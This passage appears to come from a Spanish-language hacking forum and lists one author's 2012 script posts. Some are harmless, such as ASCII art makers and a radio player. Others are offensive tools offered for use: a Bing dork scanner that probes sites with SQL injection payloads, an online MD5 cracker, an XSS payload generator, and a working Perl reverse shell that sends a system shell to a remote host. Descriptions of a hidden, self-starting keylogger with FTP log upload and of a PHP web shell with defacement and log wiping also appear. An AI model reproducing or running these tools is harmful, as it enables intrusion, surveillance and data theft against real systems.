        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub repes {
    my @limpio;
    foreach $test (@_) {
        push @limpio, $test unless $repe{$test}++;
    }
    return @limpio;
}

sub toma {
    return $nave->get( $_[0] )->content;
}

#The End ?

#224

Python / [PyQT4] BingHack Tool 0.1

Noviembre 03, 2012, 11:52:07 AM

Un simple script para buscar en bing paginas vulnerables a SQLi.

El codigo

Código: python


#!usr/bin/python
#BingHack Tool 0.1
#Coded By Doddy H

import sys,urllib2,re
from PyQt4 import QtCore,QtGui

def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()

def sql(webs):
 for web in webs :
  if re.findall("=",web): 
   web = re.split("=",web)
   web = web[0]+"="
   app.processEvents()
   try:
    code = toma(web+"-1+union+select+1--")
    if (re.findall("The used SELECT statements have a different number of columns",code,re.I)):
     new.console.appendPlainText("[SQLI] : "+web)
   except:
    pass

def limpiar(pag):

 limpia = []
 for p in pag:
  if p not in limpia:
   limpia.append(p)
 return limpia

def buscar(dork,count):

 pag = []
 s = 10  

 new.console.appendPlainText("[+] Searching pages ....")
 
 while s <= int(count):
  try:
   code = toma("http://www.bing.com/search?q="+str(dork)+"&first="+str(s))
   d = re.findall("<h3><a href=\"(.*?)\"",code,re.I)
   s += 10
   for a in d:
    pag.append(a)
  except:
   pass

 new.console.appendPlainText("[+] Cleaning ...")

 pag = limpiar(pag)
 return pag

def scan():

 new.console.clear()
 pages = buscar(new.dork.text(),new.pages.text())
 new.console.appendPlainText("[+] Scanning ...\n")
 sql(pages)
 new.console.appendPlainText("\n[+] Finished")

app = QtGui.QApplication(sys.argv)

new = QtGui.QWidget()

new.setWindowTitle("BingHack Tool 0.1 || Coded By Doddy H")
new.resize(450,470)
new.setStyleSheet("QWidget {background-color: #000000;color: #FF8000}")

new.label1 = QtGui.QLabel("Dork : ",new)
new.label1.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
new.label1.setGeometry(30,23,80,20)

new.dork = QtGui.QLineEdit(new)
new.dork.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")
new.dork.setGeometry(90,23,200,25)

new.label1 = QtGui.QLabel("Pages : ",new)
new.label1.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
new.label1.setGeometry(30,60,80,20)

new.pages = QtGui.QLineEdit(new)
new.pages.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")
new.pages.setGeometry(100,60,50,25)

new.search = QtGui.QPushButton("Scan",new)
new.search.setGeometry(305,22,110,28)
new.search.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")

new.label2 = QtGui.QLabel("Console",new)
new.label2.setStyleSheet("QWidget {background-color: #000000;color: #FF8000;font: normal 17px Verdana}")
new.label2.setGeometry(185,110,70,20)

new.console = QtGui.QPlainTextEdit(new)
new.console.setGeometry(50,150,350,300)
new.console.setStyleSheet("QWidget {background-color: #000000; color: #FF8000;border: 2px solid #FF8000}")

new.connect(new.search,QtCore.SIGNAL("clicked()"),scan)

new.show()

sys.exit(app.exec_())

# The End ?

#225

Python / [PyQT4] MD5 Crack Online 0.1

Noviembre 03, 2012, 11:51:46 AM

Un simple script para crackear un hash MD5 mediante una pagina que ofrece ese servicio.

Una imagen de como quedo

El codigo

Código: python


#!usr/bin/python
#MD5 Crack Online 0.1
#Coded By Doddy H
#Test with 098f6bcd4621d373cade4e832627b4f6

import sys,urllib2,re
from PyQt4 import QtCore,QtGui
 
def toma(web) :
 nave = urllib2.Request(web)
 nave.add_header('User-Agent','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5');
 op = urllib2.build_opener()
 return op.open(nave).read()
 
def crackit(hash):
 if(len(hash) == 32):
  code = toma("http://md5.hashcracking.com/search.php?md5="+hash)
  if (re.findall("Cleartext of "+hash+" is (.*)",code)):
   rex = re.findall("Cleartext of "+hash+" is (.*)",code)
   return rex[0]
  else:
   return "Not Found"
 else:
  print "Hash invalid"

def crack():
 new.result.setText(crackit(str(new.md5.text())))
 
app = QtGui.QApplication(sys.argv)
 
new = QtGui.QWidget()
 
new.setWindowTitle("MD5 Crack Online 0.1 || Coded By Doddy H")
new.resize(800,70)
new.setStyleSheet("QWidget {background-color: #000000;color: #00FFFF}")
 
new.label1 = QtGui.QLabel("MD5 : ",new)
new.label1.setStyleSheet("QWidget {background-color: #000000;color: #00FFFF;font: normal 17px Verdana}")
new.label1.setGeometry(20,23,80,20)
 
new.md5 = QtGui.QLineEdit(new)
new.md5.setStyleSheet("QWidget {background-color: #000000; color: #00FFFF;border: 2px solid #00FFFF}")
new.md5.setGeometry(75,23,247,25)
 
new.label2 = QtGui.QLabel("Result : ",new)
new.label2.setStyleSheet("QWidget {background-color: #000000;color: #00FFFF;font: normal 17px Verdana}")
new.label2.setGeometry(335,23,80,20)
 
new.result = QtGui.QLineEdit(new)
new.result.setStyleSheet("QWidget {background-color: #000000; color: #00FFFF;border: 2px solid #00FFFF}")
new.result.setGeometry(410,23,230,25)
 
new.search = QtGui.QPushButton("Crack",new)
new.search.setGeometry(660,23,120,28)
new.search.setStyleSheet("QWidget {background-color: #000000; color: #00FFFF;border: 2px solid #00FFFF}")
 
new.connect(new.search,QtCore.SIGNAL("clicked()"),crack)
 
new.show()
 
sys.exit(app.exec_())
 
# The End ?

#226

Perl / [Perl Tk] Project KeyCagator 1.0

Noviembre 03, 2012, 11:49:54 AM

Un simple keylogger en Perl con las siguientes opciones :

Capturar teclas reconociendo mayusculas y minusculas asi como signos
Capturar ventanas activas
Capturar el escritorio de windows cada cierto tiempo o cada click del mouse
Oculta archivos relacionados al programa
Compresion de los logs a zip
Logs ordenados en un archivo HTML
Subir logs a un servidor FTP marcado
Ejecutarse cuando se inicie Windows

Una imagen del generador del keylogger

El codigo esta You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Tambien le doy las gracias a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login que creo el primer keylogger en perl y del cual me base en parte para hacer este programa.

#227

Perl / [Perl] Radio X 0.2

Octubre 14, 2012, 09:57:25 PM

Estaba harto de escuchar siempre la misma cancion asi que mejore este script para poder escuchar musica con los siguientes generos.

Rock'n'Roll
Pop
Ambient
Trance
House

Y otros mas .......

Aclaro que necesitan bajar el mplayer , esta el link de descarga en el script , una vez que lo tengan descargado y descomprimido creen una carpeta llamada
"mplayer" y copian todos los archivos del archivo descomprimido en la carpeta recien creada , todo esto tiene que ser en el mismo directorio donde este el script.

El codigo es el siguiente

Código: perl


#!usr/bin/perl
#Radio X
#Version 0.2
#Coded By Doddy H
#
#Download : http://www.mplayerhq.hu/MPlayer/releases/win32/MPlayer-mingw32-1.0rc2.zip
#

use Cwd;

my @emisoras = (

    {},

    {

        "nombre" => "Absolute Classic Rock (Broadband)",
        "genero" => "Rock'n'Roll",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vcbb"

    },

    {

        "nombre" => "Absolute Classic Rock (Modem)",
        "genero" => "Rock'n'Roll",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vc"

    },

    {

        "nombre" => "Absolute Radio (Broadband)",
        "genero" => "Pop",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vrbb"

    },

    {

        "nombre" => "Absolute Radio (Modem)",
        "genero" => "Pop",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vr"

    },

    {

        "nombre" => "Absolute Xtreme (Broadband)",
        "genero" => "Modern Rock",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vxbb"

    },

    {

        "nombre" => "Absolute Xtreme (Modem)",
        "genero" => "Modern Rock",
        "link" =>
"http://network.absoluteradio.co.uk/core/audio/ogg/live.pls?service=vx"

    },

    {

        "nombre" => "HBR1.com - Dream Factory",
        "genero" => "Ambient",
        "link"   => "http://ubuntu.hbr1.com:19800/ambient.ogg"

    },

    {

        "nombre" => "HBR1.com - I.D.M. Tranceponder",
        "genero" => "Trance",
        "link"   => "http://ubuntu.hbr1.com:19800/trance.ogg"

    },

    {

        "nombre" => "HBR1.com - Tronic Lounge",
        "genero" => "House",
        "link"   => "http://ubuntu.hbr1.com:19800/tronic.ogg"

    },

    {

        "nombre" => "NRK Alltid Klassisk (Norway)",
        "genero" => "Desconocido",
        "link" =>
          "http://media.hiof.no/streams/m3u/nrk-alltid-klassisk-172.ogg.m3u"

    },

    {

        "nombre" => "NRK Alltid Nyheter (Norway)",
        "genero" => "Desconocido",
        "link" =>
          "http://media.hiof.no/streams/m3u/nrk-alltid-nyheter-172.ogg.m3u"

    },

    {

        "nombre" => "NRK mP3 (Norway)",
        "genero" => "Desconocido",
        "link"   => "http://media.hiof.no/streams/m3u/nrk-mpetre-172.ogg.m3u"

    },

    {

        "nombre" => "NRK P1 (Norway)",
        "genero" => "General",
        "link"   => "http://media.hiof.no/streams/m3u/nrk-p1-172.ogg.m3u",

    },

    {

        "nombre" => "NRK P2 (Norway)",
        "genero" => "General",
        "link"   => "http://media.hiof.no/streams/m3u/nrk-p2-172.ogg.m3u"

    },

    {

        "nombre" => "NRK P3 (Norway)",
        "genero" => "General",
        "link"   => "http://media.hiof.no/streams/m3u/nrk-petre-172.ogg.m3u"

    },

    {

        "nombre" => "WKNC 88.1 FM (NC State) (High Quality)",
        "genero" => "Music",
        "link"   => "http://wknc.sma.ncsu.edu:8000/wknchq.ogg.m3u"

    },

    {

        "nombre" => "WKNC 88.1 FM (NC State) (Low Quality)",
        "genero" => "Music",
        "link"   => "http://wknc.sma.ncsu.edu:8000/wkncmq.ogg.m3u"

    }

);

$SIG{INT} = \&retorno;

chdir( getcwd() . "/mplayer/" );

menu();

sub retorno {
    print "\n\n[+] Press any key for return to the menu\n\n";
    <stdin>;
    menu();
}

sub menu {

    head();

    for my $em ( 1 .. @emisoras - 1 ) {

        print "\n[+] Number : " . $em . "\n";
        print "[+] Name : " . $emisoras[$em]->{nombre} . "\n";
        print "[+] Station : " . $emisoras[$em]->{genero} . "\n";

    }

    print "\n\n[+] Option : ";
    chomp( my $op = <stdin> );

    if ( $op =~ /\d+/ ) {
        system("mplayer $emisoras[$op]->{link}");
    }

    copyright();

}

sub head {

    clean();

    print qq(


 @@@@@     @    @@@@    @   @@@@     @     @
 @    @    @    @   @   @  @    @    @     @
 @    @   @ @   @    @  @  @    @     @   @ 
 @    @   @ @   @    @  @  @    @      @ @  
 @@@@@   @   @  @    @  @  @    @       @   
 @    @  @   @  @    @  @  @    @      @ @  
 @    @  @@@@@  @    @  @  @    @     @   @ 
 @    @ @     @ @   @   @  @    @    @     @
 @    @ @     @ @@@@    @   @@@@     @     @



);

}

sub copyright {
    print "\n\n-- == (C) Doddy Hackman 2012 == --\n\n";
    <stdin>;
    exit(1);
}

sub clean {
    my $os = $^O;
    if ( $os =~ /Win32/ig ) {
        system("cls");
    }
    else {
        system("clear");
    }
}

#The End ?

Ejemplo de uso

Código: text





 @@@@@     @    @@@@    @   @@@@     @     @
 @    @    @    @   @   @  @    @    @     @
 @    @   @ @   @    @  @  @    @     @   @
 @    @   @ @   @    @  @  @    @      @ @
 @@@@@   @   @  @    @  @  @    @       @
 @    @  @   @  @    @  @  @    @      @ @
 @    @  @@@@@  @    @  @  @    @     @   @
 @    @ @     @ @   @   @  @    @    @     @
 @    @ @     @ @@@@    @   @@@@     @     @




[+] Number : 1
[+] Name : Absolute Classic Rock (Broadband)
[+] Station : Rock'n'Roll

[+] Number : 2
[+] Name : Absolute Classic Rock (Modem)
[+] Station : Rock'n'Roll

[+] Number : 3
[+] Name : Absolute Radio (Broadband)
[+] Station : Pop

[+] Number : 4
[+] Name : Absolute Radio (Modem)
[+] Station : Pop

[+] Number : 5
[+] Name : Absolute Xtreme (Broadband)
[+] Station : Modern Rock

[+] Number : 6
[+] Name : Absolute Xtreme (Modem)
[+] Station : Modern Rock

[+] Number : 7
[+] Name : HBR1.com - Dream Factory
[+] Station : Ambient

[+] Number : 8
[+] Name : HBR1.com - I.D.M. Tranceponder
[+] Station : Trance

[+] Number : 9
[+] Name : HBR1.com - Tronic Lounge
[+] Station : House

[+] Number : 10
[+] Name : NRK Alltid Klassisk (Norway)
[+] Station : Desconocido

[+] Number : 11
[+] Name : NRK Alltid Nyheter (Norway)
[+] Station : Desconocido

[+] Number : 12
[+] Name : NRK mP3 (Norway)
[+] Station : Desconocido

[+] Number : 13
[+] Name : NRK P1 (Norway)
[+] Station : General

[+] Number : 14
[+] Name : NRK P2 (Norway)
[+] Station : General

[+] Number : 15
[+] Name : NRK P3 (Norway)
[+] Station : General

[+] Number : 16
[+] Name : WKNC 88.1 FM (NC State) (High Quality)
[+] Station : Music

[+] Number : 17
[+] Name : WKNC 88.1 FM (NC State) (Low Quality)
[+] Station : Music


[+] Option : 7
MPlayer 1.0rc2-4.2.1 (C) 2000-2007 MPlayer Team
CPU: AMD Sempron(tm) 140 Processor (Family: 16, Model: 6, Stepping: 2)
CPUflags:  MMX: 1 MMX2: 1 3DNow: 1 3DNow2: 1 SSE: 1 SSE2: 1
Compiled with runtime CPU detection.

Playing http://ubuntu.hbr1.com:19800/ambient.ogg.
Resolving ubuntu.hbr1.com for AF_INET...
Connecting to server ubuntu.hbr1.com[93.94.83.51]: 19800...
Cache size set to 320 KBytes
Cache fill: 15.00% (49152 bytes)
[Ogg] stream 0: audio (Vorbis), -aid 0
Ogg file format detected.
Clip info:
 Artist: A.C.E. (chillgressive tunes)
 Name: Acid Chill Experience (DJ-Set, exclusive 4 hbr1.com)
 Album: hbr1.com
 Genre: Ambient
 Track: 1
==========================================================================
Opening audio decoder: [ffmpeg] FFmpeg/libavcodec audio decoders
Ogg : bad packet in stream 0
AUDIO: 44100 Hz, 2 ch, s16le, 64.0 kbit/4.54% (ratio: 8000->176400)
Selected audio codec: [ffvorbis] afm: ffmpeg (FFmpeg Vorbis decoder)
==========================================================================
AO: [dsound] 44100Hz 2ch s16le (2 bytes per sample)
Video: no video
Starting playback...

#228

Bugs y Exploits / [PHP Shell] Poison Shell 1.0 (Version Identada)

Octubre 08, 2012, 11:02:05 PM

Bue , no toleraba ver el codigo de mi poisonshell sin identar asi que idente el codigo y le arregle otros errores pero ninguna opcion nueva que comentar xDDD.

Las opciones desde siempre.

-- == Funciones == --

Informacion : sobre el servidor web
Navegacion de archivos y directorios :

* En esta opcion pueden editar , borrar ,renombrar y descargar archivos
* Tambien podes crear directorios nuevos
Ejecutar comandos
Subir archivos a un directorio especifico
Base64 encode() decode()
Ejecutar codigo php con eval()
Cargar phpinfo()
Crackear hash md5 con salto o sin salto
BackShell : en esta version solo esta un reverse shell en perl hecho por mi
MassDefacement : masivo deface a un directorio y todos sus subdirectorios que le sigan
CleanLogs : limpia logs de linux
Deteccion de archivo /etc/passwd o SAM para descargar
Cracker para FTP Y Mysql
PortScanner
MailBomber para varios emails
Posibilidad de buscar kernel en DB Exploit
ProxyWeb
Encode para md5,sha1,crc32
FTP

* Crear directorios nuevos
* Este cliente FTP permite navegar a traves de los directorios y archivos
* Borrar archivos
* Cambiar permisos de archivos
* Descargar archivos
SQL Manager

* Podes navegar a traves de la base datos podiendo ver todas
las bases de datos y tablas activas
* Ejecutar sentencias SQL
* Descargar tablas
* Descargar bases de datos
Cookies Manager

* En esta opcion podemos ver todos los cookies activos
* Podemos crear un cookie con el valor que queremos
Session Manager

* En esta opcion podemos ver todas las sesiones activas
* Podemos crear una sesion con el valor que queremos
Shell Protegida con user y pass
Autodestruccion de la shell

-- == --

El codigo esta aca
Código: text
```
http://pastebin.com/N03AJbm3
```
Una imagen

#229

Perl / [Perl] XSS Generator 0.2

Octubre 08, 2012, 10:21:21 PM

Cortisimo pero util script xDD.

Código: perl


#!usr/bin/perl
#XSS Generator 0.2
#Coded By Doddy H

head();

print "\n[+] Enter the code : ";
$code = <STDIN>;
chomp $code;
if ( $code ne "" ) {
    print "\n\n[XSS] : <script>var code =String.fromCharCode("
      . encode($code)
      . "); document.write(code);</script>\n";
}

copyright();

sub head {
    print "\n\n-- == XSS Generator 0.2 == --\n\n";
}

sub copyright {
    print "\n\n-- == (C) Doddy Hackman 2012 == --\n\n";
    <stdin>;
    exit(1);
}

sub encode {
    return join ',', unpack "U*", $_[0];
}

#The End ?

#230

Perl / [Perl] Reverse Shell 0.2

Octubre 08, 2012, 10:06:02 PM

Version mejorada de este script.

Código: perl


#!usr/bin/perl
#Reverse Shell 0.2
#Coded By Doddy H
#Command : nc -lvvp 666

use IO::Socket;

print "\n== -- Reverse Shell 0.2 - Doddy H 2012 -- ==\n\n";

unless ( @ARGV == 2 ) {
    print "[Sintax] : $0 <host> <port>\n\n";
    exit(1);
}
else {
    print "[+] Starting the connection\n";
    print "[+] Enter in the system\n";
    print "[+] Enjoy !!!\n\n";
    conectar( $ARGV[0], $ARGV[1] );
    tipo();
}

sub conectar {
    socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp') );
    connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) );
    open( STDIN,  ">&REVERSE" );
    open( STDOUT, ">&REVERSE" );
    open( STDERR, ">&REVERSE" );
}

sub tipo {
    print "\n[+] Reverse Shell Starting...\n\n";
    if ( $^O =~ /Win32/ig ) {
        infowin();
        system("cmd.exe");
    }
    else {
        infolinux();
        system("export TERM=xterm;exec sh -i");
    }
}

sub infowin {
    print "[+] Domain Name : " . Win32::DomainName() . "\n";
    print "[+] OS Version : " . Win32::GetOSName() . "\n";
    print "[+] Username : " . Win32::LoginName() . "\n\n\n";
}

sub infolinux {
    print "[+] System information\n\n";
    system("uname -a");
    print "\n\n";
}

#The End ?

#231

Perl / [Perl Tk] ASCII Art 0.2

Octubre 04, 2012, 07:32:04 PM

Version Tk de esta nueva version de este script para hacer ascii art desde una palabra.

Una imagen

El codigo

Código: perl


#!usr/bin/perl
#ASCII Art 0.2
#Version Tk
#Coded By Doddy H
#
#http://search.cpan.org/~lory/Text-Banner-1.00/Banner.pm
#

use Tk;
use Tk::Dialog;
use Text::Banner;

#if ( $^O eq 'MSWin32' ) {
#use Win32::Console;
#Win32::Console::Free();
#}

my $color_fondo = "black";
my $color_texto = "green";

my $ven =
  MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$ven->title("ASCII Art 0.2 || Written By Doddy H");
$ven->geometry("555x305+20+20");
$ven->resizable( 0, 0 );

my $start = Text::Banner->new;

$menula = $ven->Frame(
    -relief     => "sunken",
    -bd         => 1,
    -background => $color_fondo,
    -foreground => $color_texto
);
my $menulnowaxm = $menula->Menubutton(
    -text             => "Options",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $aboutnowaxm = $menula->Menubutton(
    -text             => "About",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
my $exitnowaxm = $menula->Menubutton(
    -text             => "Exit",
    -underline        => 1,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->pack( -side => "left" );
$menula->pack( -side => "top", -fill => "x" );

$menulnowaxm->command(
    -label      => "Scan",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&now
);

$aboutnowaxm->command(
    -label      => "About",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&about
);

$exitnowaxm->command(
    -label      => "Exit",
    -background => $color_fondo,
    -foreground => $color_texto,
    -command    => \&exitnow
);

my $fondo = $ven->Text(
    -width      => 75,
    -heigh      => 15,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 12, -y => 40 );
$ven->Label(
    -text       => "Text : ",
    -font       => "Impact1",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 265 );
my $tengo = $ven->Entry(
    -width      => 40,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 66, -y => 269 );

$ven->Label(
    -text       => "Fill : ",
    -font       => "Impact1",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 340, -y => 265 );
my $fi = $ven->Entry(
    -width      => 5,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 375, -y => 269 );

MainLoop;

sub about {
    $ven->Dialog(
        -title            => "About",
        -buttons          => ["OK"],
        -text             => "Coded By Doddy H",
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->Show();
}

sub exitnow {
    exit(1);
}

sub artnow {

    $start->set( $tengo->get );
    $start->fill( $fi->get );

    return $start->get;

}

sub now {

    $fondo->delete( "0.1", "end" );

    my $now  = $tengo->get;
    my $code = artnow($now);

    $fondo->insert( "end", $code );

}

#The End ?

#232

Perl / [Perl] ASCII Art 0.2

Octubre 04, 2012, 07:31:47 PM

Una posible version mejorada de este script para hacer ascii art desde una palabra.

El codigo

Código: perl


#!usr/bin/perl
#ASCII Art 0.2
#Coded By Doddy H
#
#http://search.cpan.org/~lory/Text-Banner-1.00/Banner.pm
#

use Text::Banner;
use Time::HiRes "usleep";

my $start = Text::Banner->new;

sub head {

    my @logo = (
        "#=============================================#", "\n",
        "#            ASCII Art 0.2                    #", "\n",
        "#---------------------------------------------#", "\n",
        "# Written By Doddy H                          #", "\n",
        "# Email: lepuke[at]hotmail[com]               #", "\n",
        "# Website: doddyhackman.webcindario.com       #", "\n",
        "#---------------------------------------------#", "\n",
        "# The End ?                                   #", "\n",
        "#=============================================#", "\n"
    );

    print "\n";
    marquesina(@logo);

}

head();

print "\n\n[+] Text : ";
chomp( my $text = <stdin> );

print "\n\n[+] Fill : ";
chomp( my $fill = <stdin> );

print "\n\n\n" . artnow( $text, $fill ) . "\n";

copyright();

sub artnow {

    $start->set( $_[0] );
    $start->fill( $_[1] );

    return $start->get;

}

sub marquesina {

    #Effect based in the exploits by Jafer Al Zidjali

    my @logo = @_;

    my $car = "|";

    for my $uno (@logo) {
        for my $dos ( split //, $uno ) {

            $|++;

            if ( $car eq "|" ) {
                mostrar( "\b" . $dos . $car, "/" );
            }
            elsif ( $car eq "/" ) {
                mostrar( "\b" . $dos . $car, "-" );
            }
            elsif ( $car eq "-" ) {
                mostrar( "\b" . $dos . $car, "\\" );
            }
            else {
                mostrar( "\b" . $dos . $car, "|" );
            }
            usleep(40_000);
        }
        print "\b ";
    }

    sub mostrar {
        print $_[0];
        $car = $_[1];
    }

}

sub copyright {

    print "\n\n";

    marquesina("-- == (C) Doddy Hackman 2012 == --");

    print "\n\n";

    <stdin>;
    exit(1);
}

#The End ?

Un ejemplo de uso

Código: text




r00t ~ # art2.pl



#=============================================#
#            ASCII Art 0.2                    #
#---------------------------------------------#
# Written By Doddy H                          #
# Email: lepuke[at]hotmail[com]               #
# Website: doddyhackman.webcindario.com       #
#---------------------------------------------#
# The End ?                                   #
#=============================================#


[+] Text : hacked


[+] Fill : #




 #    #    ##     ####   #    #  ######  #####
 #    #   #  #   #    #  #   #   #       #    #
 ######  #    #  #       ####    #####   #    #
 #    #  ######  #       #  #    #       #    #
 #    #  #    #  #    #  #   #   #       #    #
 #    #  #    #   ####   #    #  ######  #####




-- == (C) Doddy Hackman 2012 == --

#233

Perl / [Perl Tk] ASCII Art 0.1

Octubre 02, 2012, 08:19:19 PM

Version Tk de este simple script para hacer ASCII Art desde una palabra.

El codigo

Código: perl


#!usr/bin/perl
#ASCII Art 0.1
#Version Tk
#Coded By Doddy H
#Thanks to : reLlene,MARKO,explorer

use Tk;
use Tk::Dialog;
use List::Util "max";

if ( $^O eq 'MSWin32' ) {
    use Win32::Console;
    Win32::Console::Free();
}

my %letras = (

    a => "         
   @   
   @   
  @ @  
  @ @  
 @   @ 
 @   @ 
 @@@@@ 
@     @
@     @
",

    b => "
 @@@@ 
 @   @
 @   @
 @   @
 @@@@ 
 @   @
 @   @
 @   @
 @@@@ 
",

    c => "
  @@@@ 
 @    @
 @     
 @     
 @     
 @     
 @     
 @    @
  @@@@ 
",

    d => "
 @@@@  
 @   @ 
 @    @
 @    @
 @    @
 @    @
 @    @
 @   @ 
 @@@@  
",

    e => "
 @@@@@
 @    
 @    
 @    
 @@@@ 
 @    
 @    
 @    
 @@@@@
",
    f => "
 @@@@@
 @    
 @    
 @    
 @@@@ 
 @    
 @    
 @    
 @    
",
    g => "
  @@@@ 
 @    @
 @     
 @     
 @  @@@
 @    @
 @    @
 @   @@
  @@@ @
",
    h => "
 @    @
 @    @
 @    @
 @    @
 @@@@@@
 @    @
 @    @
 @    @
 @    @
",
    i => "
 @
 @
 @
 @
 @
 @
 @
 @
 @
",
    j => "
   @
   @
   @
   @
   @
   @
@  @
@  @
 @@ 
",
    k => "
 @   @ 
 @  @  
 @ @   
 @@    
 @@    
 @ @   
 @  @  
 @   @ 
 @    @
",
    l => "
 @    
 @    
 @    
 @    
 @    
 @    
 @    
 @    
 @@@@@
",
    m => "
 @     @
 @     @
 @@   @@
 @@   @@
 @ @ @ @
 @ @ @ @
 @  @  @
 @  @  @
 @     @
",
    n => "
 @    @
 @@   @
 @@   @
 @ @  @
 @ @  @
 @  @ @
 @   @@
 @   @@
 @    @
",
    o => "
  @@@@ 
 @    @
 @    @
 @    @
 @    @
 @    @
 @    @
 @    @
  @@@@ 
",
    p => "
 @@@@@ 
 @    @
 @    @
 @    @
 @@@@@ 
 @     
 @     
 @     
 @     
",
    q => "
  @@@@ 
 @    @
 @    @
 @    @
 @    @
 @    @
 @  @ @
 @   @@
  @@@@ 
      @
",
    r => "
 @@@@@ 
 @    @
 @    @
 @    @
 @@@@@ 
 @    @
 @    @
 @    @
 @    @
",
    s => "
  @@@ 
 @   @
 @    
 @    
  @@@ 
     @
     @
 @   @
  @@@ 
",
    t => "
 @@@@@
   @  
   @  
   @  
   @  
   @  
   @  
   @  
   @  
",
    u => "
 @    @
 @    @
 @    @
 @    @
 @    @
 @    @
 @    @
 @    @
  @@@@ 
",
    v => "
@     @
@     @
 @   @ 
 @   @ 
 @   @ 
  @ @  
  @ @  
   @   
   @   
",
    W => "
@         @
@         @
 @   @   @ 
 @   @   @ 
 @   @   @ 
  @ @ @ @  
  @ @ @ @  
   @   @   
   @   @   
",
    x => "
@     @
@     @
 @   @ 
  @ @  
   @   
  @ @  
 @   @ 
@     @
@     @
",
    y => "
@     @
@     @
 @   @ 
  @ @  
   @   
   @   
   @   
   @   
   @   
",
    z => "
@@@@@@@
      @
     @ 
    @  
   @   
  @    
 @     
@      
@@@@@@@
"

);

my $color_fondo = "black";
my $color_texto = "green";

my $ven =
  MainWindow->new( -background => $color_fondo, -foreground => $color_texto );
$ven->title("ASCII Art 0.1 || Written By Doddy H");
$ven->geometry("555x300+20+20");
$ven->resizable( 0, 0 );

my $fondo = $ven->Text(
    -width      => 75,
    -heigh      => 15,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 15, -y => 10 );
$ven->Label(
    -text       => "Text : ",
    -font       => "Impact1",
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 20, -y => 250 );
my $tengo = $ven->Entry(
    -width      => 40,
    -background => $color_fondo,
    -foreground => $color_texto
)->place( -x => 66, -y => 254 );
$ven->Button(
    -command          => \&now,
    -text             => "Now!",
    -width            => 10,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 320, -y => 252 );
$ven->Button(
    -command          => \&about,
    -text             => "About",
    -width            => 10,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 395, -y => 252 );
$ven->Button(
    -command          => \&exitnow,
    -text             => "Exit",
    -width            => 10,
    -background       => $color_fondo,
    -foreground       => $color_texto,
    -activebackground => $color_texto
)->place( -x => 470, -y => 252 );

MainLoop;

sub about {
    $ven->Dialog(
        -title            => "About",
        -buttons          => ["OK"],
        -text             => "Coded By Doddy H",
        -background       => $color_fondo,
        -foreground       => $color_texto,
        -activebackground => $color_texto
    )->Show();
}

sub exitnow {
    exit(1);
}

sub now {

    $fondo->delete( "0.1", "end" );

    my $now  = $tengo->get;
    my $code = artnow($now);

    $fondo->insert( "end", $code );

}

sub artnow {

    my $target = shift;

    my $fondo   = " ";
    my $espacio = 0;

    my $lugar;
    my @lotengo;

    my $tipox = $letras{"a"};
    my @lineas = split /\n/, $tipox;
    $altura = @lineas + 1;

    $anchura = max map { length $_ } @lineas;

    for ( 1 .. $altura ) {
        push @lotengo, $fondo x ( ( $anchura + $espacio ) * length $target );
    }

    for my $letra ( split //, $target ) {
        my @lineas = split /\n/, $letras{$letra};

        for my $i ( 0 .. $altura - 1 ) {
            ( my $plan = $lineas[$i] ) =~ s/ /$fondo/g;

            $plan = $fondo x $anchura if not $plan;

            substr( $lotengo[$i], $lugar, length $plan ) = $plan;
        }

        $lugar += $anchura + $espacio;
    }

    return ( join "\n", @lotengo );

}

#The End ?

Una imagen

#234

Perl / [Perl] ASCII Art 0.1

Octubre 02, 2012, 08:19:06 PM

